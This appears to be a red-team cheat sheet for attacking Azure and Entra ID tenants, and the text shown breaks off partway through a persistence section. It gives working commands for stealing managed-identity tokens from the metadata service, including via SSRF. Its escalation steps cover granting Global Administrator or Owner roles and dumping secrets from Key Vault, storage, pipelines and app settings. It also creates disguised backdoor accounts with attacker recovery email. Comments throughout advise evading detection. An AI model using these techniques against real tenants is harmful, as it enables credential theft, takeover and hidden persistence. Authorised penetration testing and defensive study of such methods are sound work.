Cloud Pentesting (Azure)#
Azure Metadata Service & Privilege Escalation#
Azure VM Metadata Service (IMDS) Exploitation#
Instance Metadata Service v2 (Current Standard):#
# Azure IMDS endpoint (no authentication required from within VM)
# Different from AWS - uses custom header, not token-based
# Get instance metadata
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq .
# Get instance compute information
curl -H Metadata:true "http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01" | jq .
# Extract useful information
curl -H Metadata:true "http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01" | jq '{
vmId: .vmId,
subscriptionId: .subscriptionId,
resourceGroupName: .resourceGroupName,
location: .location,
name: .name
}'
# Get network information
curl -H Metadata:true "http://169.254.169.254/metadata/instance/network?api-version=2021-02-01" | jq .
# Get scheduled events (maintenance notifications)
curl -H Metadata:true "http://169.254.169.254/metadata/scheduledevents?api-version=2020-07-01" | jq .
# CRITICAL: Get managed identity access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq .
# Get Microsoft Graph token (for Entra ID access)
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/" | jq .
# Get Key Vault token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/" | jq .
# Get Storage token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/" | jq .
# Get SQL Database token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://database.windows.net/" | jq .
# For user-assigned managed identities (specify client ID)
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/&client_id=<client-id>" | jq .
# Extract token from response
TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq -r .access_token)
# OPSEC: IMDS access doesn't require authentication
# No logs generated for metadata queries
# Tokens typically valid for 24 hours
SSRF Exploitation for IMDS Access:#
# Azure IMDS via SSRF (simpler than AWS - only requires header injection)
# If you can control HTTP headers in SSRF
GET http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
Header: Metadata: true
# If header injection not possible, look for proxy/redirect vulnerabilities
# Azure IMDS requires "Metadata: true" header - no way around it
# URL encoding for header injection attempts
Metadata:%20true
# In HTTP parameter pollution scenarios
?Metadata=true&url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# OPSEC: SSRF to IMDS is common attack vector
# Azure's header requirement makes it slightly harder than AWS IMDSv1
Using Retrieved Managed Identity Tokens:#
# Test ARM token
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01" | jq .
# Get current identity information
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/providers/Microsoft.ManagedIdentity/identities?api-version=2018-11-30" | jq .
# List accessible subscriptions
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01" | jq '.value[] | {subscriptionId, displayName}'
# Use token with Azure CLI
az login --service-principal \
-u <managed-identity-client-id> \
-p $TOKEN \
--tenant <tenant-id> \
--allow-no-subscriptions
# Or set as access token
az account get-access-token # This will use system-assigned identity if available
# Use with PowerShell
Connect-AzAccount -AccessToken $TOKEN -AccountId <subscription-id>
# Use Graph token
GRAPH_TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/" | jq -r .access_token)
curl -H "Authorization: Bearer $GRAPH_TOKEN" \
"https://graph.microsoft.com/v1.0/me" | jq .
# OPSEC: Managed identity tokens are service principals
# Actions appear as system-assigned identity, harder to attribute to specific user
Decoding and Analyzing JWT Tokens:#
# Decode JWT token (header.payload.signature)
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq .
# Or use online tool: https://jwt.io/
# Key JWT claims to examine:
# - oid: Object ID of the identity
# - tid: Tenant ID
# - aud: Audience (which service token is for)
# - exp: Expiration timestamp
# - iat: Issued at timestamp
# - appid: Application ID (for service principals)
# - roles: Role claims (permissions)
# Check token expiration
exp_timestamp=$(echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq -r .exp)
exp_date=$(date -d @$exp_timestamp 2>/dev/null || date -r $exp_timestamp 2>/dev/null)
echo "Token expires: $exp_date"
# OPSEC: Understanding token claims helps identify privilege level
App Service / Function App Metadata Access:#
# App Services also have access to managed identity tokens
# Same IMDS endpoint works from App Service environment
# Additionally, App Services have environment variables
# MSI_ENDPOINT and MSI_SECRET (older authentication method)
# Check for MSI environment variables
echo $MSI_ENDPOINT
echo $MSI_SECRET
# Use MSI endpoint (legacy method, still works)
curl "$MSI_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" \
-H "Secret: $MSI_SECRET" | jq .
# OPSEC: App Services often have elevated permissions
# Check both IMDS and MSI_ENDPOINT methods
Privilege Escalation Techniques#
1. Managed Identity Abuse (Most Common):#
# Scenario: You're on a VM/App Service with managed identity
# Get token and enumerate permissions
TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq -r .access_token)
# Check what you can do
az login --service-principal \
-u <client-id> \
-p $TOKEN \
--tenant <tenant-id> \
--allow-no-subscriptions
# List role assignments for this identity
az role assignment list --assignee <managed-identity-object-id> --all
# Common escalation paths:
# - Contributor on subscription = full control over resources
# - Owner = can grant roles to others
# - User Access Administrator = can grant roles
# - Key Vault access = retrieve secrets, certificates
# If identity has Key Vault access, enumerate secrets
az keyvault list
az keyvault secret list --vault-name <vault-name>
az keyvault secret show --vault-name <vault-name> --name <secret-name>
# OPSEC: Managed identities are invisible to user-based CA policies
# High-privilege managed identities are common misconfigurations
2. Application Owner to Service Principal Credentials:#
# Scenario: You own an application registration
# Add credentials to the application's service principal
# List applications you own
Get-MgApplication -Filter "owners/any(o:o/id eq '<your-user-object-id>')"
# Or check directly
Get-MgApplicationOwner -ApplicationId <app-object-id>
# Add password credential (client secret)
$passwordCred = @{
DisplayName = "DevOps Deployment Key"
EndDateTime = (Get-Date).AddYears(2)
}
$newCred = Add-MgApplicationPassword -ApplicationId <app-object-id> -PasswordCredential $passwordCred
# Save the secret value (only shown once)
$clientSecret = $newCred.SecretText
Write-Host "Client Secret: $clientSecret"
# Add certificate credential (more stealthy)
$cert = New-SelfSignedCertificate -Subject "CN=AppAuth" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature
$certBase64 = [Convert]::ToBase64String($cert.Export([System.Security.Cryptography.X509Certificates.X509ContentType]::Cert))
Add-MgApplicationKey -ApplicationId <app-object-id> -KeyCredential @{
Type = "AsymmetricX509Cert"
Usage = "Verify"
Key = [System.Text.Encoding]::UTF8.GetBytes($certBase64)
}
# Authenticate with the new credentials
$tenantId = "<tenant-id>"
$appId = "<application-id>"
# Using client secret
az login --service-principal -u $appId -p $clientSecret --tenant $tenantId
# Using certificate
Connect-AzAccount -ServicePrincipal -ApplicationId $appId -Tenant $tenantId -CertificateThumbprint $cert.Thumbprint
# Check service principal's permissions
Get-MgServicePrincipal -Filter "appId eq '$appId'"
$sp = Get-MgServicePrincipal -Filter "appId eq '$appId'"
Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $sp.Id
# OPSEC: Application owners can add credentials without additional privileges
# Certificate authentication generates less obvious audit logs than secrets
3. Service Principal with Application.ReadWrite.All:#
# Scenario: Service principal has Application.ReadWrite.All permission
# Can modify any application, including adding high-privilege permissions
# Create new application with privileged permissions
$app = New-MgApplication -DisplayName "InfrastructureAutomation" -Description "Infrastructure management tools"
# Add Microsoft Graph permissions
$graphResourceId = "00000003-0000-0000-c000-000000000000" # Microsoft Graph
# High-value permissions
$permissions = @(
@{
Id = "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" # RoleManagement.ReadWrite.Directory
Type = "Role"
},
@{
Id = "19dbc75e-c2e2-444c-a770-ec69d8559fc7" # Directory.ReadWrite.All
Type = "Role"
},
@{
Id = "62a82d76-70ea-41e2-9197-370581804d09" # Group.ReadWrite.All
Type = "Role"
}
)
Update-MgApplication -ApplicationId $app.Id -RequiredResourceAccess @{
ResourceAppId = $graphResourceId
ResourceAccess = $permissions
}
# Create service principal
New-MgServicePrincipal -AppId $app.AppId
# Grant admin consent (if you have Cloud Application Administrator role)
# This requires additional privileges but is the goal
# Manual step: Portal > Enterprise Apps > App > Permissions > Grant admin consent
# OPSEC: Application.ReadWrite.All is extremely powerful
# Can create applications with any permissions (though admin consent still needed)
4. Directory Role Assignment (If You Have Permissions):#
# Scenario: You have Privileged Role Administrator or similar
# Assign yourself or controlled identity to privileged roles
# Get available directory roles
Get-MgDirectoryRoleTemplate -All
# Activate role (if not already active)
$roleTemplate = Get-MgDirectoryRoleTemplate | Where-Object {$_.DisplayName -eq "Global Administrator"}
New-MgDirectoryRole -RoleTemplateId $roleTemplate.Id
# Assign user to role
$role = Get-MgDirectoryRole -Filter "displayName eq 'Global Administrator'"
$user = Get-MgUser -UserId "target-user@domain.com"
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $role.Id -BodyParameter @{
"@odata.id" = "https://graph.microsoft.com/v1.0/users/$($user.Id)"
}
# Verify assignment
Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id
# OPSEC: Highly logged action; use sparingly
# Consider assigning to less obvious roles first (Security Administrator, etc.)
5. Azure RBAC Privilege Escalation (Subscription Level):#
# Scenario: You have User Access Administrator or Owner role
# Grant yourself elevated roles on subscription/resource groups
# Grant Owner role to your user
az role assignment create \
--assignee "user@domain.com" \
--role "Owner" \
--scope "/subscriptions/<subscription-id>"
# Or grant to managed identity
az role assignment create \
--assignee <managed-identity-object-id> \
--role "Contributor" \
--scope "/subscriptions/<subscription-id>/resourceGroups/<rg-name>"
# Create custom role with specific permissions
az role definition create --role-definition '{
"Name": "Custom Backup Administrator",
"Description": "Can manage backups and recovery",
"Actions": [
"*"
],
"NotActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}'
# Assign custom role
az role assignment create \
--assignee "user@domain.com" \
--role "Custom Backup Administrator" \
--scope "/subscriptions/<subscription-id>"
# OPSEC: RBAC changes logged in Activity Log
# Custom roles with broad permissions may go unnoticed longer than built-in roles
6. Automation Account RunAs Account Abuse:#
# Scenario: You have access to Automation Account
# RunAs accounts (now deprecated but still in use) have service principal credentials
# Get automation account
$automationAccount = Get-AzAutomationAccount -ResourceGroupName "rg-name" -Name "account-name"
# Check for RunAs account (legacy)
Get-AzAutomationConnection -ResourceGroupName "rg-name" -AutomationAccountName "account-name"
# Create new credential in automation account
New-AzAutomationCredential -ResourceGroupName "rg-name" \
-AutomationAccountName "account-name" \
-Name "BackupCreds" \
-Value (Get-Credential)
# Create runbook that uses credential
$runbookScript = @'
param($credentialName)
$credential = Get-AutomationPSCredential -Name $credentialName
Connect-AzAccount -Credential $credential
Get-AzSubscription
'@
New-AzAutomationRunbook -ResourceGroupName "rg-name" \
-AutomationAccountName "account-name" \
-Name "CredentialTest" \
-Type PowerShell \
-Description "Test credential"
Import-AzAutomationRunbook -ResourceGroupName "rg-name" \
-AutomationAccountName "account-name" \
-Name "CredentialTest" \
-Path "runbook.ps1" \
-Type PowerShell
Publish-AzAutomationRunbook -ResourceGroupName "rg-name" \
-AutomationAccountName "account-name" \
-Name "CredentialTest"
Start-AzAutomationRunbook -ResourceGroupName "rg-name" \
-AutomationAccountName "account-name" \
-Name "CredentialTest"
# OPSEC: Automation accounts often have broad permissions
# Runbooks can be scheduled or triggered on-demand
7. Key Vault Certificate-Based Authentication:#
# Scenario: You have access to Key Vault with certificate
# Extract certificate and use for authentication
# Download certificate
az keyvault certificate download \
--vault-name "vault-name" \
--name "cert-name" \
--file "cert.pem"
# Download private key (if accessible)
az keyvault secret show \
--vault-name "vault-name" \
--name "cert-name" \
--query value \
--output tsv | base64 -d > cert.pfx
# Convert PFX to PEM (if needed)
openssl pkcs12 -in cert.pfx -out cert-with-key.pem -nodes
# Extract thumbprint
openssl x509 -in cert.pem -noout -fingerprint -sha1 | sed 's/://g' | cut -d= -f2
# Authenticate with certificate
az login --service-principal \
--username <application-id> \
--tenant <tenant-id> \
--certificate cert-with-key.pem
# OPSEC: Certificate authentication is common for service principals
# Certificates may have long validity periods (years)
8. Storage Account Key Escalation:#
# Scenario: You have storage account access
# Storage accounts may contain deployment credentials, connection strings
# List storage accounts you can access
az storage account list --output table
# Get storage account keys
az storage account keys list \
--account-name "storage-name" \
--resource-group "rg-name"
# Use keys to access storage
az storage container list \
--account-name "storage-name" \
--account-key "<key>"
# Search for credentials in blobs
az storage blob list \
--container-name "deployments" \
--account-name "storage-name" \
--account-key "<key>" \
--query "[?contains(name, 'publish') || contains(name, 'cred') || contains(name, '.env')]"
# Download interesting blobs
az storage blob download \
--container-name "container" \
--name "app-settings.json" \
--account-name "storage-name" \
--account-key "<key>" \
--file "./app-settings.json"
# Check for ARM templates with secrets
az storage blob download \
--container-name "templates" \
--name "deployment.json" \
--account-name "storage-name" \
--account-key "<key>"
# OPSEC: Storage accounts are data goldmines
# Look for: .env files, publish profiles, ARM templates, backup files
9. Logic App / Function App Environment Variable Extraction:#
# Scenario: You have access to Logic App or Function App
# Extract connection strings and credentials from configuration
# Get Function App settings
az functionapp config appsettings list \
--name "function-name" \
--resource-group "rg-name"
# Look for sensitive keys
az functionapp config appsettings list \
--name "function-name" \
--resource-group "rg-name" \
--query "[?contains(name, 'SECRET') || contains(name, 'KEY') || contains(name, 'PASSWORD') || contains(name, 'CONNECTION')]"
# Get Logic App connections
az logic workflow show \
--resource-group "rg-name" \
--name "logic-app-name"
# OPSEC: Serverless apps often have hardcoded credentials
# Connection strings may contain database passwords, API keys
10. DevOps Pipeline Secrets Extraction:#
# Scenario: You have access to Azure DevOps
# Extract secrets from pipelines, variable groups
# List Azure DevOps organizations (requires Azure DevOps CLI)
az devops project list --organization "https://dev.azure.com/org-name"
# List pipelines
az pipelines list --organization "https://dev.azure.com/org-name" --project "project-name"
# Get pipeline variables
az pipelines variable list \
--organization "https://dev.azure.com/org-name" \
--project "project-name" \
--pipeline-id <pipeline-id>
# List variable groups
az pipelines variable-group list \
--organization "https://dev.azure.com/org-name" \
--project "project-name"
# Get variable group values
az pipelines variable-group show \
--organization "https://dev.azure.com/org-name" \
--project "project-name" \
--group-id <group-id>
# OPSEC: DevOps pipelines often have production credentials
# Service connections may have contributor/owner permissions
Azure - Automated Tools & Persistence#
Automated Reconnaissance Tools#
ROADtools (Azure AD/Entra ID Reconnaissance):#
# Installation
pip3 install roadrecon
# Or from source
git clone https://github.com/dirkjanm/ROADtools.git
cd ROADtools
pip3 install .
# PHASE 1: Authentication and data gathering
# Method 1: Interactive authentication
roadrecon auth --username user@domain.com --password 'password'
# Method 2: Access token authentication
roadrecon auth --access-token 'eyJ0eXAiOiJKV1Q...'
# Method 3: Refresh token (longer-lived)
roadrecon auth --refresh-token 'eyJ0eXAiOiJKV1Q...'
# Method 4: Device code flow (for MFA-protected accounts)
roadrecon auth --device-code
# PHASE 2: Gather data from Entra ID
roadrecon gather
# This collects:
# - All users, groups, service principals
# - Applications and OAuth grants
# - Directory roles and assignments
# - Devices and Conditional Access policies
# - Administrative units
# - Domain information
# Gather with specific token scopes
roadrecon gather --tokens-stdin
# PHASE 3: GUI analysis (BloodHound-style interface)
roadrecon gui
# Web interface opens at http://localhost:5000
# Visualize attack paths, privilege relationships
# PHASE 4: Plugin system for custom queries
roadrecon plugin -h
# Export data for offline analysis
roadrecon dump
# OPSEC: ROADtools queries Graph API extensively
# Use slowly or during business hours
# Token-based auth leaves minimal footprint vs. interactive login
AzureHound (BloodHound for Azure):#
# Installation (part of BloodHound CE now)
# Download from: https://github.com/BloodHoundAD/AzureHound/releases
chmod +x azurehound
./azurehound -h
# Authentication methods
# Method 1: Interactive device code
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d
# Method 2: Service principal
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" \
-a "<application-id>" -s "<client-secret>"
# Method 3: Certificate-based
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" \
-a "<application-id>" -c "<certificate.pem>"
# Method 4: JWT token
./azurehound -r "https://graph.microsoft.com" -j "<jwt-token>"
# List available collectors
./azurehound list
# Run all collectors
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d list -o output.json
# Run specific collectors
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d \
--collectors "groups,users,servicePrincipals,roles,managementGroups"
# Output formats
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d -o azure-data.json
# Import into BloodHound
# 1. Start BloodHound CE
# 2. Upload azure-data.json
# 3. Run Cypher queries for attack paths
# Useful BloodHound queries for Azure:
# - Find paths to Global Admin
# - Identify application owners
# - Map service principal permissions
# - Find key vault access paths
# OPSEC: AzureHound generates many Graph API calls
# Use during business hours to blend in
# Consider rate limiting with --delay flag
Stormspotter (Azure Red Team Tool):#
# Installation
git clone https://github.com/Azure/Stormspotter.git
cd Stormspotter
# Using Docker (recommended)
docker-compose up
# Backend setup
cd backend
pip3 install -r requirements.txt
# Frontend setup
cd ../frontend
npm install
# Authentication
# Stormspotter uses device code flow
# Run data collection
python3 stormspotter/ssrun.py
# This collects:
# - Subscription and resource data
# - RBAC assignments
# - Network topology
# - Storage and database configurations
# - Key vaults and secrets metadata
# View in web interface
# Navigate to http://localhost:3000
# Generate attack graph
# Visualizes relationships between Azure resources
# Identifies privilege escalation paths
# Export data
python3 stormspotter/ssexport.py --output azure-export.json
# OPSEC: Comprehensive collection tool
# Focuses on Azure resources more than Entra ID
# Complements ROADtools/AzureHound
PowerZure (Azure Exploitation Framework):#
# Installation
Install-Module -Name PowerZure -Force
# Or from GitHub
git clone https://github.com/hausec/PowerZure.git
Import-Module .\PowerZure.psd1
# Import module
Import-Module PowerZure
# Authenticate
# Uses existing Az PowerShell session
Connect-AzAccount
# Alternative: Use access token
$token = "eyJ0eXAiOiJKV1Q..."
# PowerZure will use existing session
# RECONNAISSANCE COMMANDS:
# Get current context
Get-AzureTarget
# Enumerate subscriptions and permissions
Get-AzureTargets
# Find interesting resources
Get-AzureRunAsAccounts # Automation account credentials
Get-AzureKeyVaultContent # Key Vault secrets
Get-AzureStorageContent # Storage account data
Get-AzureSQLDB # SQL databases
Get-AzureVMs # Virtual machines
# Find role assignments
Get-AzureRoleMembers -Role "Owner"
Get-AzureRoleMembers -Role "Contributor"
# EXPLOITATION COMMANDS:
# Create backdoor user (if you have permissions)
New-Backdoor -Username "svc-backup" -Password "P@ssw0rd123!"
# Execute commands on VMs (if you have access)
Execute-Command -VM "vm-name" -ResourceGroup "rg-name" -Command "whoami"
# Create runbook for persistence
New-Backdoor -Runbook
# Dump Key Vault secrets
Get-AzureKeyVaultContent -All
# LATERAL MOVEMENT:
# Find trusts between subscriptions
Get-AzureTargets
# Enumerate management groups
Get-AzManagementGroup
# OPSEC FEATURES:
# Check for monitoring
Get-AzureSecurityCenter
# List alert rules
Get-AlertRules
# OPSEC: PowerZure is older but still functional
# Some cmdlets may need updates for latest Azure changes
# Good for quick wins and enumeration
MicroBurst (Azure Security Assessment):#
# Installation
git clone https://github.com/NetSPI/MicroBurst.git
Import-Module .\MicroBurst.psm1
# Or install from PowerShell Gallery
Install-Module -Name MicroBurst -Force
# Import module
Import-Module MicroBurst
# ENUMERATION MODULES:
# Enumerate Azure subdomains (external recon)
Invoke-EnumerateAzureSubDomains -Base "company"
# Finds: company.onmicrosoft.com, company.sharepoint.com, etc.
# Enumerate storage account names
Invoke-EnumerateAzureBlobs -Base "company"
# Brute-forces common storage account naming patterns
# Test for public blob containers
Invoke-EnumerateAzureBlobs -Base "company" -Verbose
# Enumerate publicly accessible storage containers
Get-AzureStorageBlobs
# Once authenticated:
# Get all readable storage content
Get-AzPasswords
# Searches storage accounts for passwords, keys, connection strings
# Enumerate Azure AD users (from inside)
Get-AzureADUsers
# Get service principal information
Get-AzureDomainInfo
# Find application passwords/secrets metadata
Get-MsolDomainInfo
# VM credential extraction
Get-AzureVMDisk
# Analyzes VM disks for credentials
# PRIVILEGE ESCALATION:
# Execute command on VM via Custom Script Extension
Invoke-AzureRmVMBulkCMD -VM "vm-name" -ResourceGroup "rg-name" -Command "whoami"
# Create backdoor via Automation Account
New-AzureBackdoor
# OPSEC NOTES:
# External enumeration (subdomains, storage) is passive
# Internal enumeration generates normal Graph/ARM API calls
# VM command execution may trigger alerts
ScoutSuite (Multi-Cloud, includes Azure):#
# Installation
pip install scoutsuite
# Azure scan with browser authentication
scout azure
# Use specific authentication method
scout azure --cli # Uses Azure CLI session
scout azure --user-account # Interactive browser login
scout azure --service-principal --tenant-id <tenant> --client-id <client> --client-secret <secret>
# Scan specific subscriptions
scout azure --subscriptions <subscription-id>
# Scan with custom ruleset
scout azure --ruleset-name custom-rules.json
# Output options
scout azure --report-dir ./azure-report
scout azure --no-browser # Don't open browser automatically
# Scan results include:
# - IAM misconfigurations
# - Network security issues
# - Storage account public access
# - Key Vault security
# - SQL database configurations
# - VM security settings
# - Entra ID (Azure AD) issues
# Generate HTML report with findings
# Categorized by severity and compliance frameworks
# OPSEC: Read-only assessment tool
# Comprehensive but noisy (many API calls)
# Use with --max-workers 1 to throttle requests
Custom Enumeration Script:#
# Azure Red Team Enumeration Script
# Save as: Azure-RedTeam-Enum.ps1
param(
[switch]$StealthMode,
[switch]$FullEnum,
[string]$OutputDir = "./azure-enum-results"
)
# Create output directory
New-Item -ItemType Directory -Force -Path $OutputDir | Out-Null
Write-Host "[*] Starting Azure Red Team Enumeration" -ForegroundColor Cyan
# Get current context
Write-Host "[+] Checking authentication context..." -ForegroundColor Green
$context = Get-AzContext
if (-not $context) {
Write-Host "[-] Not authenticated. Run Connect-AzAccount first." -ForegroundColor Red
exit
}
$context | Export-Clixml "$OutputDir/context.xml"
# Subscription enumeration
Write-Host "[+] Enumerating subscriptions..." -ForegroundColor Green
$subscriptions = Get-AzSubscription
$subscriptions | Export-Csv "$OutputDir/subscriptions.csv" -NoTypeInformation
# For each subscription
foreach ($sub in $subscriptions) {
Set-AzContext -Subscription $sub.Id | Out-Null
Write-Host "[+] Processing subscription: $($sub.Name)" -ForegroundColor Yellow
# RBAC assignments
Write-Host " [+] Collecting RBAC assignments..." -ForegroundColor Green
$roleAssignments = Get-AzRoleAssignment
$roleAssignments | Export-Csv "$OutputDir/$($sub.Name)-rbac.csv" -NoTypeInformation
# Resource groups
Write-Host " [+] Collecting resource groups..." -ForegroundColor Green
$rgs = Get-AzResourceGroup
$rgs | Export-Csv "$OutputDir/$($sub.Name)-resourcegroups.csv" -NoTypeInformation
# Virtual Machines
Write-Host " [+] Collecting VMs..." -ForegroundColor Green
$vms = Get-AzVM -Status
$vms | Select-Object Name, ResourceGroupName, Location, PowerState, @{N="OsType";E={$_.StorageProfile.OsDisk.OsType}} |
Export-Csv "$OutputDir/$($sub.Name)-vms.csv" -NoTypeInformation
# Storage Accounts
Write-Host " [+] Collecting storage accounts..." -ForegroundColor Green
$storageAccounts = Get-AzStorageAccount
$storageAccounts | Export-Csv "$OutputDir/$($sub.Name)-storage.csv" -NoTypeInformation
# Key Vaults
Write-Host " [+] Collecting Key Vaults..." -ForegroundColor Green
$keyVaults = Get-AzKeyVault
$keyVaults | Export-Csv "$OutputDir/$($sub.Name)-keyvaults.csv" -NoTypeInformation
# SQL Servers
Write-Host " [+] Collecting SQL Servers..." -ForegroundColor Green
$sqlServers = Get-AzSqlServer
$sqlServers | Export-Csv "$OutputDir/$($sub.Name)-sql.csv" -NoTypeInformation
# Web Apps
Write-Host " [+] Collecting Web Apps..." -ForegroundColor Green
$webApps = Get-AzWebApp
$webApps | Export-Csv "$OutputDir/$($sub.Name)-webapps.csv" -NoTypeInformation
if (-not $StealthMode) {
# NSGs (more detailed)
Write-Host " [+] Collecting NSG rules..." -ForegroundColor Green
$nsgs = Get-AzNetworkSecurityGroup
$nsgRules = @()
foreach ($nsg in $nsgs) {
foreach ($rule in $nsg.SecurityRules) {
$nsgRules += [PSCustomObject]@{
NSG = $nsg.Name
RuleName = $rule.Name
Priority = $rule.Priority
Direction = $rule.Direction
Access = $rule.Access
Protocol = $rule.Protocol
SourceAddress = ($rule.SourceAddressPrefix -join ', ')
DestinationPort = ($rule.DestinationPortRange -join ', ')
}
}
}
$nsgRules | Export-Csv "$OutputDir/$($sub.Name)-nsg-rules.csv" -NoTypeInformation
}
if ($StealthMode) {
Start-Sleep -Seconds 5 # Rate limiting
}
}
# Entra ID enumeration (requires Microsoft.Graph)
if (Get-Module -ListAvailable -Name Microsoft.Graph) {
Write-Host "[+] Enumerating Entra ID..." -ForegroundColor Green
try {
Connect-MgGraph -Scopes "Directory.Read.All" -NoWelcome -ErrorAction Stop
# Users
Write-Host " [+] Collecting users..." -ForegroundColor Green
$users = Get-MgUser -All
$users | Select-Object DisplayName, UserPrincipalName, AccountEnabled, UserType |
Export-Csv "$OutputDir/entra-users.csv" -NoTypeInformation
# Groups
Write-Host " [+] Collecting groups..." -ForegroundColor Green
$groups = Get-MgGroup -All
$groups | Export-Csv "$OutputDir/entra-groups.csv" -NoTypeInformation
# Directory Roles
Write-Host " [+] Collecting directory roles..." -ForegroundColor Green
$roles = Get-MgDirectoryRole -All
$roleMembers = @()
foreach ($role in $roles) {
$members = Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id
foreach ($member in $members) {
$roleMembers += [PSCustomObject]@{
Role = $role.DisplayName
MemberUPN = $member.AdditionalProperties.userPrincipalName
MemberType = $member.AdditionalProperties.'@odata.type'
}
}
}
$roleMembers | Export-Csv "$OutputDir/entra-role-members.csv" -NoTypeInformation
# Applications
Write-Host " [+] Collecting applications..." -ForegroundColor Green
$apps = Get-MgApplication -All
$apps | Select-Object DisplayName, AppId, CreatedDateTime |
Export-Csv "$OutputDir/entra-applications.csv" -NoTypeInformation
# Service Principals
Write-Host " [+] Collecting service principals..." -ForegroundColor Green
$sps = Get-MgServicePrincipal -All
$sps | Select-Object DisplayName, AppId, ServicePrincipalType |
Export-Csv "$OutputDir/entra-service-principals.csv" -NoTypeInformation
} catch {
Write-Host "[-] Error enumerating Entra ID: $_" -ForegroundColor Red
}
}
Write-Host "[*] Enumeration complete! Results saved to: $OutputDir" -ForegroundColor Cyan
Write-Host "[*] Review the CSV files for findings" -ForegroundColor Cyan
# Generate summary report
$summary = @"
Azure Red Team Enumeration Summary
===================================
Date: $(Get-Date)
Subscriptions: $($subscriptions.Count)
Output Directory: $OutputDir
Files Generated:
- subscriptions.csv
- *-rbac.csv (per subscription)
- *-resourcegroups.csv
- *-vms.csv
- *-storage.csv
- *-keyvaults.csv
- *-sql.csv
- *-webapps.csv
- entra-*.csv (if Graph access available)
Next Steps:
1. Review RBAC assignments for privilege escalation
2. Check storage accounts for public access
3. Enumerate Key Vault secrets (if permissions allow)
4. Review NSG rules for network access
5. Check for managed identities on VMs/Apps
"@
$summary | Out-File "$OutputDir/SUMMARY.txt"
Write-Host $summary
Usage:
powershell
# Standard enumeration
.\Azure-RedTeam-Enum.ps1
# Stealth mode (slower, with delays)
.\Azure-RedTeam-Enum.ps1 -StealthMode
# Full enumeration (more detailed)
.\Azure-RedTeam-Enum.ps1 -FullEnum
# Custom output directory
.\Azure-RedTeam-Enum.ps1 -OutputDir "C:\temp\azure-results"
Azure - Persistence Mechanisms & Detection Evasion#
Persistence Mechanisms#
1. Entra ID (Azure AD) User Backdoor:#
# Create inconspicuous user account
$PasswordProfile = @{
Password = "ComplexP@ssw0rd123!"
ForceChangePasswordNextSignIn = $false
}
New-MgUser -DisplayName "Microsoft Support Engineer" `
-UserPrincipalName "mssupport@domain.onmicrosoft.com" `
-MailNickname "mssupport" `
-AccountEnabled `
-PasswordProfile $PasswordProfile
# Add to privileged group (less obvious than direct role assignment)
$user = Get-MgUser -Filter "userPrincipalName eq 'mssupport@domain.onmicrosoft.com'"
$group = Get-MgGroup -Filter "displayName eq 'Help Desk Administrators'"
New-MgGroupMember -GroupId $group.Id -DirectoryObjectId $user.Id
# Or assign directory role
$role = Get-MgDirectoryRole -Filter "displayName eq 'Security Administrator'"
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $role.Id -BodyParameter @{
"@odata.id" = "https://graph.microsoft.com/v1.0/users/$($user.Id)"
}
# Add alternate email for recovery
Update-MgUser -UserId $user.Id -OtherMails @("recovery@attacker-domain.com")
# Disable audit logging for this user (if you have permissions)
# Note: This is highly detectable but included for completeness
Update-MgUser -UserId $user.Id -UserType "Guest" # Guest users sometimes have less logging
# OPSEC: Use service account naming conventions
# Good names: "svc-backup", "azure-sync", "o365-integration"
# Add to legitimate-looking groups rather than direct role assignments
# Set account to not require password change
# Azure CLI equivalent
az ad user create \
--display-name "Azure Backup Service" \
--user-principal-name "azbackup@domain.onmicrosoft.com" \
--password "ComplexP@ssw0rd123!" \
--force-change-password-next-sign-in false
# Add to group
az ad group member add \
--group "Help Desk Administrators" \
--member-id $(az ad user show --id "azbackup@domain.onmicrosoft.com" --query id -o tsv)
2. Service Principal / Application Registration Backdoor:#
# Create application registration
$app = New-MgApplication -DisplayName "Infrastructure Monitoring Agent" `
-Description "Azure infrastructure monitoring and alerting service"
# Create service principal
$sp = New-MgServicePrincipal -AppId $app.AppId
# Add client secret (note: secrets expire, set long duration)
